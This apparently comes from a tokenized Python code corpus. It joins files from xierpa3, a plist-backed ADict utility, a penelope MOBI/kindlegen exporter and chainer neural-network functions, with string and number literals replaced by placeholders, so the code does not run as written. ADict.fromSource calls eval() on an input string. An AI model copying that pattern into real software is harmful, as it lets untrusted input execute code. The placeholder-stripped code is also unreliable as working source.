'<STR_LIT:__main__>' : <EOL> version = VERSION <EOL> if DEV : <EOL> import cutils . ccom <EOL> import cutils . clic <EOL> import cutils . cver <EOL> exceptions = cutils . clic . EXCEPTIONS + ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> version = cutils . cver . version ( '<STR_LIT:.>' , sub_max = <NUM_LIT:9> , rev_max = <NUM_LIT> , build_max = <NUM_LIT> ) [ : <NUM_LIT:3> ] <EOL> cutils . ccom . collect ( '<STR_LIT:.>' , exceptions = exceptions ) <EOL> cutils . clic . header ( '<STR_LIT:.>' , exceptions = exceptions ) <EOL> sys . exit ( CoubletApp ( version ) . run ( ) ) </s>
<s> from xierpa3 . builders . htmlbuilder import HtmlBuilder <EOL> class PhpBuilder ( HtmlBuilder ) : <EOL> u"""<STR_LIT>""" <EOL> C = HtmlBuilder . C <EOL> ID = C . TYPE_PHP <EOL> EXTENSION = ID <EOL> ATTR_POSTFIX = ID <EOL> def page ( self , component ) : <EOL> u"""<STR_LIT>""" <EOL> self . pushResult ( ) <EOL> HtmlBuilder . page ( self , component ) <EOL> self . phpHeader = self . popResult ( ) <EOL> pass <EOL> def _page ( self , component ) : <EOL> u"""<STR_LIT>""" <EOL> self . pushResult ( ) <EOL> HtmlBuilder . _page ( self , component ) <EOL> self . phpFooter = self . popResult ( ) <EOL> pass <EOL> def XXXclear ( self , result = None ) : <EOL> pass <EOL> def save ( self , component , root = None , path = None , extension = None ) : <EOL> u"""<STR_LIT>""" <EOL> root = root or self . ROOTPATH <EOL> rootPath = root + '<STR_LIT>' <EOL> path = self . getFilePath ( component , root ) <EOL> dirPath = self . makeDirectory ( path ) <EOL> for fileName , content in ( ( '<STR_LIT>' , self . phpHeader ) , ( '<STR_LIT>' , self . phpFooter ) ) : <EOL> filePath = rootPath + fileName <EOL> f = open ( filePath , '<STR_LIT:wb>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> for template in component . getTemplates ( ) : <EOL> filePath = dirPath + '<STR_LIT:/>' + template . name + '<STR_LIT:.>' + ( extension or self . EXTENSION ) <EOL> template . build ( self ) <EOL> f = open ( filePath , '<STR_LIT:wb>' ) <EOL> f . write ( self . getResult ( ) ) <EOL> f . close ( ) <EOL> return path <EOL> def buildCssLinks ( self , component ) : <EOL> u"""<STR_LIT>""" <EOL> for cssUrl in component . css : <EOL> if not cssUrl . startswith ( '<STR_LIT>' ) : <EOL> cssUrl = '<STR_LIT>' + cssUrl <EOL> self . link ( href = cssUrl , type = "<STR_LIT>" , charset = "<STR_LIT>" , rel = "<STR_LIT>" , media = "<STR_LIT>" ) </s>
<s> from xierpa3 . components . component import Component <EOL> class Sidebar ( Component ) : <EOL> C = Component . C </s>
<s> """<STR_LIT>""" <EOL> __version__ = '<STR_LIT>' <EOL> __author__ = "<STR_LIT>" <EOL> content = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> ] , <EOL> } </s>
<s> import plistlib <EOL> class A ( object ) : <EOL> @ classmethod <EOL> def _getListClass ( cls ) : <EOL> return AList <EOL> @ classmethod <EOL> def _getDictClass ( cls ) : <EOL> return ADict <EOL> def __repr__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return u'<STR_LIT>' % ( self . __class__ . __name__ , self . _data_ ) <EOL> def __len__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . _data_ ) <EOL> def __setitem__ ( self , indexOrKey , value ) : <EOL> """<STR_LIT>""" <EOL> self . _data_ [ indexOrKey ] = value <EOL> def __getitem__ ( self , indexOrKey ) : <EOL> """<STR_LIT>""" <EOL> value = self . _data_ [ indexOrKey ] <EOL> if isinstance ( value , dict ) : <EOL> value = self . _getDictClass ( ) ( value ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> value = self . _getListClass ( ) ( value ) <EOL> return value <EOL> def __eq__ ( self , other ) : <EOL> u"""<STR_LIT>""" <EOL> if isinstance ( other , A ) : <EOL> other = other . _data_ <EOL> return self . _data_ == other <EOL> def __ne__ ( self , other ) : <EOL> u"""<STR_LIT>""" <EOL> return not self . __eq__ ( other ) <EOL> def asPList ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return plistlib . writePlistToString ( self . _data_ ) <EOL> @ classmethod <EOL> def fromPList ( cls , s ) : <EOL> u"""<STR_LIT>""" <EOL> obj = plistlib . readPlistFromString ( s ) <EOL> if isinstance ( obj , dict ) : <EOL> return cls . _getDictClass ( ) ( obj ) <EOL> elif isinstance ( obj , ( list , tuple ) ) : <EOL> return cls . _getListClass ( ) ( obj ) <EOL> raise TypeError ( "<STR_LIT>" % type ( obj ) . __name__ ) <EOL> def asSource ( self ) : <EOL> """<STR_LIT>""" <EOL> return repr ( self . _data_ ) <EOL> @ classmethod <EOL> def fromSource ( cls , s ) : <EOL> """<STR_LIT>""" <EOL> compiled = eval ( s ) <EOL> if isinstance ( compiled , dict ) : <EOL> return cls . _getDictClass ( ) ( compiled ) <EOL> if isinstance ( compiled , ( list , tuple ) ) : <EOL> return cls . _getListClass ( ) ( compiled ) <EOL> return compiled <EOL> class AList ( A ) : <EOL> u"""<STR_LIT>""" <EOL> def __init__ ( self , data = None ) : <EOL> """<STR_LIT>""" <EOL> if data is None : <EOL> data = [ ] <EOL> elif isinstance ( data , AList ) : <EOL> data = data . _data_ <EOL> self . _data_ = data <EOL> def clear ( self ) : <EOL> u"""<STR_LIT>""" <EOL> self . _data_ = [ ] <EOL> def asList ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ <EOL> def append ( self , o ) : <EOL> u"""<STR_LIT>""" <EOL> self . _data_ . append ( o ) <EOL> def readFrom ( self , o , clear = True ) : <EOL> u"""<STR_LIT>""" <EOL> from copy import deepcopy <EOL> if clear : <EOL> self . clear ( ) <EOL> for e in o : <EOL> if isinstance ( e , ADict ) : <EOL> e = e . asDict ( ) <EOL> elif isinstance ( e , AList ) : <EOL> e = e . asList ( ) <EOL> self . append ( deepcopy ( e ) ) <EOL> class ADict ( A ) : <EOL> u"""<STR_LIT>""" <EOL> _RESERVEDNAMES = set ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def __init__ ( self , d = None ) : <EOL> u"""<STR_LIT>""" <EOL> if d is None : <EOL> d = { } <EOL> elif isinstance ( d , self . _getDictClass ( ) ) : <EOL> d = d . asDict ( ) <EOL> else : <EOL> for k in d : <EOL> self . _assertValidName ( k ) <EOL> self . _data_ = d <EOL> def _assertValidName ( self , name ) : <EOL> if not isinstance ( name , basestring ) : <EOL> raise TypeError ( '<STR_LIT>' % ( self . __class__ . __name__ , type ( name ) . __name__ , name ) ) <EOL> if name in self . _RESERVEDNAMES or name . startswith ( '<STR_LIT:_>' ) : <EOL> raise ValueError ( '<STR_LIT>' % ( self . __class__ . __name__ , type ( name ) . __name__ , name ) ) <EOL> def asDict ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ <EOL> def clear ( self ) : <EOL> u"""<STR_LIT>""" <EOL> self . _data_ = { } <EOL> def readFrom ( self , o , clear = False ) : <EOL> u"""<STR_LIT>""" <EOL> from copy import deepcopy <EOL> if clear : <EOL> self . clear ( ) <EOL> for key in o : <EOL> e = o [ key ] <EOL> if isinstance ( e , ADict ) : <EOL> e = e . asDict ( ) <EOL> elif isinstance ( e , AList ) : <EOL> e = e . asList ( ) <EOL> self [ key ] = deepcopy ( e ) <EOL> @ classmethod <EOL> def fromCopy ( cls , d ) : <EOL> u"""<STR_LIT>""" <EOL> td = cls ( ) <EOL> td . readFrom ( d ) <EOL> return td <EOL> @ classmethod <EOL> def fromDict ( cls , d ) : <EOL> u"""<STR_LIT>""" <EOL> return cls ( d ) <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return iter ( self . _data_ ) <EOL> def keys ( self ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ . keys ( ) <EOL> def items ( self ) : <EOL> u"""<STR_LIT>""" <EOL> wrapped = { } <EOL> for key in self . _data_ . keys ( ) : <EOL> wrapped [ key ] = self [ key ] <EOL> return wrapped . items ( ) <EOL> def values ( self ) : <EOL> u"""<STR_LIT>""" <EOL> values = [ ] <EOL> for key in self . _data_ . keys ( ) : <EOL> values . append ( self [ key ] ) <EOL> return values <EOL> def get ( self , name , default = None ) : <EOL> u"""<STR_LIT>""" <EOL> try : <EOL> return self [ name ] <EOL> except KeyError : <EOL> return default <EOL> def __contains__ ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> return self . _data_ . has_key ( name ) <EOL> def has_key ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> return self . __contains__ ( name ) <EOL> def __getitem__ ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> value = self . _data_ [ name ] <EOL> if isinstance ( value , dict ) : <EOL> value = self . _getDictClass ( ) ( value ) <EOL> elif isinstance ( value , ( tuple , list ) ) : <EOL> value = self . _getListClass ( ) ( value ) <EOL> return value <EOL> def __setitem__ ( self , name , value ) : <EOL> u"""<STR_LIT>""" <EOL> self . _assertValidName ( name ) <EOL> if isinstance ( value , self . __class__ ) : <EOL> value = value . _data_ <EOL> elif isinstance ( value , AList ) : <EOL> value = value . asList ( ) <EOL> self . _data_ [ name ] = value <EOL> def __getattr__ ( self , name ) : <EOL> u"""<STR_LIT>""" <EOL> try : <EOL> return self [ name ] <EOL> except KeyError : <EOL> raise AttributeError ( repr ( name ) ) <EOL> def __setattr__ ( self , name , value ) : <EOL> u"""<STR_LIT>""" <EOL> if name . startswith ( '<STR_LIT:_>' ) : <EOL> self . __dict__ [ name ] = value <EOL> else : <EOL> self . _assertValidName ( name ) <EOL> if isinstance ( value , A ) : <EOL> self . _data_ [ name ] = value . _data_ <EOL> else : <EOL> self . _data_ [ name ] = value <EOL> def __delitem__ ( self , key ) : <EOL> r"""<STR_LIT>""" <EOL> del self . _data_ [ key ] <EOL> def __delattr__ ( self , key ) : <EOL> r"""<STR_LIT>""" <EOL> try : <EOL> self . __delitem__ ( key ) <EOL> except KeyError : <EOL> raise AttributeError ( repr ( key ) ) <EOL> def _test ( ) : <EOL> r"""<STR_LIT>""" <EOL> def _runDocTests ( ) : <EOL> import doctest <EOL> import fbits . toolbox . storage . adict <EOL> return doctest . testmod ( fbits . toolbox . storage . adict ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _runDocTests ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from io import open <EOL> import os <EOL> import subprocess <EOL> from penelope . dictionary_ebook import DictionaryEbook <EOL> from penelope . utilities import print_debug <EOL> from penelope . utilities import print_error <EOL> from penelope . utilities import print_info <EOL> from penelope . utilities import create_temp_directory <EOL> from penelope . utilities import copy_file <EOL> from penelope . utilities import delete_directory <EOL> __author__ = "<STR_LIT>" <EOL> __copyright__ = "<STR_LIT>" <EOL> __license__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT>" <EOL> __email__ = "<STR_LIT>" <EOL> __status__ = "<STR_LIT>" <EOL> KINDLEGEN = u"<STR_LIT>" <EOL> def read ( dictionary , args , input_file_paths ) : <EOL> print_error ( "<STR_LIT>" ) <EOL> return None <EOL> def write ( dictionary , args , output_file_path ) : <EOL> result = None <EOL> output_file_path_absolute = os . path . abspath ( output_file_path ) <EOL> dictionary . sort ( by_headword = True , ignore_case = args . sort_ignore_case ) <EOL> special_group , group_keys , group_dict = dictionary . group ( <EOL> prefix_function_path = args . group_by_prefix_function , <EOL> prefix_length = int ( args . group_by_prefix_length ) , <EOL> merge_min_size = int ( args . group_by_prefix_merge_min_size ) , <EOL> merge_across_first = args . group_by_prefix_merge_across_first <EOL> ) <EOL> all_group_keys = group_keys <EOL> if special_group is not None : <EOL> all_group_keys += [ u"<STR_LIT>" ] <EOL> mobi = DictionaryEbook ( ebook_format = DictionaryEbook . MOBI , args = args ) <EOL> for key in all_group_keys : <EOL> if key == u"<STR_LIT>" : <EOL> group_entries = special_group <EOL> else : <EOL> group_entries = group_dict [ key ] <EOL> mobi . add_group ( key , group_entries ) <EOL> print_debug ( "<STR_LIT>" % ( output_file_path_absolute ) , args . debug ) <EOL> mobi . write ( output_file_path_absolute , compress = False ) <EOL> result = [ output_file_path ] <EOL> print_debug ( "<STR_LIT>" % ( output_file_path_absolute ) , args . debug ) <EOL> tmp_path = mobi . get_tmp_path ( ) <EOL> if args . mobi_no_kindlegen : <EOL> print_info ( "<STR_LIT>" % tmp_path ) <EOL> result = [ tmp_path ] <EOL> else : <EOL> try : <EOL> print_debug ( "<STR_LIT>" , args . debug ) <EOL> kindlegen_path = KINDLEGEN <EOL> opf_file_path_absolute = os . path . join ( tmp_path , "<STR_LIT>" , "<STR_LIT>" ) <EOL> mobi_file_path_relative = u"<STR_LIT>" <EOL> mobi_file_path_absolute = os . path . join ( tmp_path , "<STR_LIT>" , mobi_file_path_relative ) <EOL> if args . kindlegen_path is None : <EOL> print_info ( "<STR_LIT>" % KINDLEGEN ) <EOL> else : <EOL> kindlegen_path = args . kindlegen_path <EOL> print_info ( "<STR_LIT>" % ( KINDLEGEN , kindlegen_path ) ) <EOL> proc = subprocess . Popen ( <EOL> [ kindlegen_path , opf_file_path_absolute , "<STR_LIT>" , mobi_file_path_relative ] , <EOL> stdout = subprocess . PIPE , <EOL> stdin = subprocess . PIPE , <EOL> stderr = subprocess . PIPE <EOL> ) <EOL> output = proc . communicate ( ) <EOL> if args . debug : <EOL> output_unicode = ( output [ <NUM_LIT:0> ] ) . decode ( "<STR_LIT:utf-8>" ) <EOL> print_debug ( output_unicode , args . debug ) <EOL> copy_file ( mobi_file_path_absolute , output_file_path_absolute ) <EOL> result = [ output_file_path ] <EOL> print_debug ( "<STR_LIT>" , args . debug ) <EOL> except OSError as exc : <EOL> print_error ( "<STR_LIT>" % ( KINDLEGEN , kindlegen_path ) ) <EOL> print_error ( "<STR_LIT>" % KINDLEGEN ) <EOL> print_error ( "<STR_LIT>" ) <EOL> print_error ( "<STR_LIT>" ) <EOL> tmp_path = mobi . get_tmp_path ( ) <EOL> if args . keep : <EOL> print_info ( "<STR_LIT>" % ( tmp_path ) ) <EOL> else : <EOL> mobi . delete ( ) <EOL> print_debug ( "<STR_LIT>" % ( tmp_path ) , args . debug ) <EOL> return result </s>
<s> from __future__ import print_function <EOL> import sys <EOL> import chainer <EOL> from chainer import cuda <EOL> from chainer import function <EOL> class PrintHook ( function . FunctionHook ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self , sep = '<STR_LIT>' , end = '<STR_LIT:\n>' , file = sys . stdout , flush = True ) : <EOL> self . sep = sep <EOL> self . end = end <EOL> self . file = file <EOL> self . flush = flush <EOL> def _print ( self , msg ) : <EOL> print ( msg , sep = self . sep , end = self . end , file = self . file ) <EOL> def _process ( self , function , in_data , out_grad = None ) : <EOL> self . _print ( '<STR_LIT>' . format ( function . label ) ) <EOL> self . _print ( '<STR_LIT>' ) <EOL> for d in in_data : <EOL> self . _print ( chainer . Variable ( d ) . debug_print ( ) ) <EOL> if out_grad is not None : <EOL> self . _print ( '<STR_LIT>' ) <EOL> for d in out_grad : <EOL> xp = cuda . get_array_module ( d ) <EOL> v = chainer . Variable ( xp . zeros_like ( d , dtype = d . dtype ) ) <EOL> v . grad = d <EOL> self . _print ( v . debug_print ( ) ) <EOL> if self . flush : <EOL> self . file . flush ( ) <EOL> def forward_preprocess ( self , function , in_data ) : <EOL> self . _process ( function , in_data ) <EOL> def backward_preprocess ( self , function , in_data , out_grad ) : <EOL> self . _process ( function , in_data , out_grad ) </s>
<s> import numpy <EOL> from chainer import cuda <EOL> from chainer import function <EOL> from chainer . utils import array <EOL> from chainer . utils import type_check <EOL> class BilinearFunction ( function . Function ) : <EOL> def check_type_forward ( self , in_types ) : <EOL> n_in = in_types . size ( ) . eval ( ) <EOL> if n_in != <NUM_LIT:3> and n_in != <NUM_LIT:6> : <EOL> raise type_check . InvalidType ( <EOL> '<STR_LIT>' % ( in_types . size ( ) == <NUM_LIT:3> , in_types . size ( ) == <NUM_LIT:6> ) , <EOL> '<STR_LIT>' % ( in_types . size ( ) , n_in ) ) <EOL> e1_type , e2_type , W_type = in_types [ : <NUM_LIT:3> ] <EOL> type_check_prod = type_check . Variable ( numpy . prod , '<STR_LIT>' ) <EOL> type_check . expect ( <EOL> e1_type . dtype == numpy . float32 , <EOL> e1_type . ndim >= <NUM_LIT:2> , <EOL> e2_type . dtype == numpy . float32 , <EOL> e2_type . ndim >= <NUM_LIT:2> , <EOL> e1_type . shape [ <NUM_LIT:0> ] == e2_type . shape [ <NUM_LIT:0> ] , <EOL> W_type . dtype == numpy . float32 , <EOL> W_type . ndim == <NUM_LIT:3> , <EOL> type_check_prod ( e1_type . shape [ <NUM_LIT:1> : ] ) == W_type . shape [ <NUM_LIT:0> ] , <EOL> type_check_prod ( e2_type . shape [ <NUM_LIT:1> : ] ) == W_type . shape [ <NUM_LIT:1> ] , <EOL> ) <EOL> if n_in == <NUM_LIT:6> : <EOL> out_size = W_type . shape [ <NUM_LIT:2> ] <EOL> V1_type , V2_type , b_type = in_types [ <NUM_LIT:3> : ] <EOL> type_check . expect ( <EOL> V1_type . dtype == numpy . float32 , <EOL> V1_type . ndim == <NUM_LIT:2> , <EOL> V1_type . shape [ <NUM_LIT:0> ] == W_type . shape [ <NUM_LIT:0> ] , <EOL> V1_type . shape [ <NUM_LIT:1> ] == out_size , <EOL> V2_type . dtype == numpy . float32 , <EOL> V2_type . ndim == <NUM_LIT:2> , <EOL> V2_type . shape [ <NUM_LIT:0> ] == W_type . shape [ <NUM_LIT:1> ] , <EOL> V2_type . shape [ <NUM_LIT:1> ] == out_size , <EOL> b_type . dtype == numpy . float32 , <EOL> b_type . ndim == <NUM_LIT:1> , <EOL> b_type . shape [ <NUM_LIT:0> ] == out_size , <EOL> ) <EOL> def forward ( self , inputs ) : <EOL> e1 = array . as_mat ( inputs [ <NUM_LIT:0> ] ) <EOL> e2 = array . as_mat ( inputs [ <NUM_LIT:1> ] ) <EOL> W = inputs [ <NUM_LIT:2> ] <EOL> xp = cuda . get_array_module ( * inputs ) <EOL> if xp is numpy : <EOL> y = numpy . einsum ( '<STR_LIT>' , e1 , e2 , W ) <EOL> else : <EOL> i_len , j_len = e1 . shape <EOL> k_len = e2 . shape [ <NUM_LIT:1> ] <EOL> e1e2 = e1 [ : , : , None ] * e2 [ : , None , : ] <EOL> e1e2 = e1e2 . reshape ( i_len , j_len * k_len ) <EOL> W_mat = W . reshape ( - <NUM_LIT:1> , W . shape [ <NUM_LIT:2> ] ) <EOL> y = e1e2 . dot ( W_mat ) <EOL> if len ( inputs ) == <NUM_LIT:6> : <EOL> V1 , V2 , b = inputs [ <NUM_LIT:3> : ] <EOL> y += e1 . dot ( V1 ) <EOL> y += e2 . dot ( V2 ) <EOL> y += b <EOL> return y , <EOL> def backward ( self , inputs , grad_outputs ) : <EOL> e1 = array . as_mat ( inputs [ <NUM_LIT:0> ] ) <EOL> e2 = array . as_mat ( inputs [ <NUM_LIT:1> ] ) <EOL> W = inputs [ <NUM_LIT:2> ] <EOL> gy = grad_outputs [ <NUM_LIT:0> ] <EOL> xp = cuda . get_array_module ( * inputs ) <EOL> if xp is numpy : <EOL> gW = numpy . einsum ( '<STR_LIT>' , e1 , e2 , gy ) <EOL> ge1 = numpy . einsum ( '<STR_LIT>' , e2 , W , gy ) <EOL> ge2 = numpy . einsum ( '<STR_LIT>' , e1 , W , gy ) <EOL> else : <EOL> kern = cuda . reduce ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <EOL> '<STR_LIT>' ) <EOL> e1_b = e1 [ : , : , None , None ] <EOL> e2_b = e2 [ : , None , : , None ] <EOL> gy_b = gy [ : , None , None , : ] <EOL> W_b = W [ None , : , : , : ] <EOL> gW = kern ( e1_b , e2_b , gy_b , axis = <NUM_LIT:0> ) <EOL> ge1 = kern ( e2_b , W_b , gy_b , axis = ( <NUM_LIT:2> , <NUM_LIT:3> ) ) <EOL> ge2 = kern ( e1_b , W_b , gy_b , axis = ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> ret = ge1 . reshape ( inputs [ <NUM_LIT:0> ] . shape ) , ge2 . reshape ( inputs [ <NUM_LIT:1> ] . shape ) , gW <EOL> if len ( inputs ) == <NUM_LIT:6> : <EOL> V1 , V2 , b = inputs [ <NUM_LIT:3> : ] <EOL> gV1 = e1 . T . dot ( gy ) <EOL> gV2 = e2 . T . dot ( gy ) <EOL> gb = gy . sum ( <NUM_LIT:0> ) <EOL> ge1 += gy . dot ( V1 . T ) <EOL> ge2 += gy . dot ( V2 . T ) <EOL> ret += gV1 , gV2 , gb <EOL> return ret <EOL> def bilinear ( e1 , e2 , W , V1 = None , V2 = None , b = None ) : <EOL> """<STR_LIT>""" <EOL> flags = [ V1 is None , V2 is None , b is None ] <EOL> if any ( flags ) : <EOL> if not all ( flags ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return BilinearFunction ( ) ( e1 , e2 , W ) <EOL> else : <EOL> return BilinearFunction ( ) ( e1 , e2 , W , V1 , V2 , b ) </s>
<s> import numpy <EOL> from chainer import cuda <EOL> from chainer import function <EOL> from chainer . utils import type_check <EOL> class Dropout ( function . Function ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , dropout_ratio ) : <EOL> self . dropout_ratio = dropout_ratio <EOL> def check_type_forwrad ( self , in_types ) : <EOL> type_check . expect ( in_types . size ( ) == <NUM_LIT:1> ) <EOL> def forward ( self , x ) : <EOL> scale = x [ <NUM_LIT:0> ] . dtype . type ( <NUM_LIT:1.> / ( <NUM_LIT:1> - self . dropout_ratio ) ) <EOL> xp = cuda . get_array_module ( * x ) <EOL> if xp == numpy : <EOL> flag = xp . random . rand ( * x [ <NUM_LIT:0> ] . shape ) >= self . dropout_ratio <EOL> else : <EOL> flag = ( xp . random . rand ( * x [ <NUM_LIT:0> ] . shape , dtype = numpy . float32 ) >= <EOL> self . dropout_ratio ) <EOL> self . mask = scale * flag <EOL> return x [ <NUM_LIT:0> ] * self . mask , <EOL> def backward ( self , x , gy ) : <EOL> return gy [ <NUM_LIT:0> ] * self . mask , <EOL> def dropout ( x , ratio = <NUM_LIT> , train = True ) : <EOL> """<STR_LIT>""" <EOL> if train : <EOL> return Dropout ( ratio ) ( x ) <EOL> return x </s>
<s> from chainer import cuda <EOL> from chainer . functions . math import identity <EOL> from chainer import link <EOL> class Parameter ( link . Link ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , array ) : <EOL> super ( Parameter , self ) . __init__ ( ) <EOL> self . add_param ( '<STR_LIT>' , array . shape , dtype = array . dtype ) <EOL> self . W . data = array <EOL> if isinstance ( array , cuda . ndarray ) : <EOL> self . to_gpu ( array ) <EOL> def __call__ ( self , volatile = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> W = identity . identity ( self . W ) <EOL> W . volatile = volatile <EOL> return identity . identity ( W ) </s>
<s> import numpy <EOL> from chainer import cuda <EOL> class WalkerAlias ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , probs ) : <EOL> prob = numpy . array ( probs , numpy . float32 ) <EOL> prob /= numpy . sum ( prob ) <EOL> threshold = numpy . ndarray ( len ( probs ) , numpy . float32 ) <EOL> values = numpy . ndarray ( len ( probs ) * <NUM_LIT:2> , numpy . int32 ) <EOL> il , ir = <NUM_LIT:0> , <NUM_LIT:0> <EOL> pairs = list ( zip ( prob , range ( len ( probs ) ) ) ) <EOL> pairs . sort ( ) <EOL> for prob , i in pairs : <EOL> p = prob * len ( probs ) <EOL> while p > <NUM_LIT:1> and ir < il : <EOL> values [ ir * <NUM_LIT:2> + <NUM_LIT:1> ] = i <EOL> p -= <NUM_LIT:1.0> - threshold [ ir ] <EOL> ir += <NUM_LIT:1> <EOL> threshold [ il ] = p <EOL> values [ il * <NUM_LIT:2> ] = i <EOL> il += <NUM_LIT:1> <EOL> for i in range ( ir , len ( probs ) ) : <EOL> values [ i * <NUM_LIT:2> + <NUM_LIT:1> ] = <NUM_LIT:0> <EOL> assert ( ( values < len ( threshold ) ) . all ( ) ) <EOL> self . threshold = threshold <EOL> self . values = values <EOL> self . use_gpu = False <EOL> def to_gpu ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . use_gpu : <EOL> self . threshold = cuda . to_gpu ( self . threshold ) <EOL> self . values = cuda . to_gpu ( self . values ) <EOL> self . use_gpu = True <EOL> def to_cpu ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . use_gpu : <EOL> self . threshold = cuda . to_cpu ( self . threshold ) <EOL> self . values = cuda . to_cpu ( self . values ) <EOL> self . use_gpu = False 